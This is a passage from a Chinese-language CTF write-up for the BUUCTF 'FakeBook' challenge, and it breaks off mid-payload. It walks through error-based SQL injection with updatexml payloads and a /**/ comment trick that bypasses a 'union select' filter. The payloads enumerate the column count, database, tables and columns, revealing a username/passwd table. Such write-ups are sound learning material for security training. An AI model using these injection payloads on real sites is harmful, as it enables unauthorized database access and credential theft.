写在前面:BUUCTF限制了请求速率,所以扫描工具不太好使,但是字典数量巨大,因此有些文件路径是真的不太好扫出来的🥶
FakeBook
信息收集
预期解
登录/注册
Sql注入
登录和注册位置都没试出注入点
注册反而遇到点问题,后面路径发现源码才知道blog要些xx.xx的格式
发现注入点,过滤了union select
能通过/**/
替代空格绕过,也可以通过报错注入,以下会提供两种方式
# 方法1 报错注入
# 查字段数
?no=-1 order by 4
# 爆库名
?no=1 and updatexml(1,concat('~',database()),1)
# 表名
?no=1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)
# 查字段
?no=1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database())),1)
# 返回:[*] query error! (XPATH syntax error:
'~no,username,passwd,data')
# 查内容一个个看
?no=1 and updatexml(1,concat('~',(select data from fakebook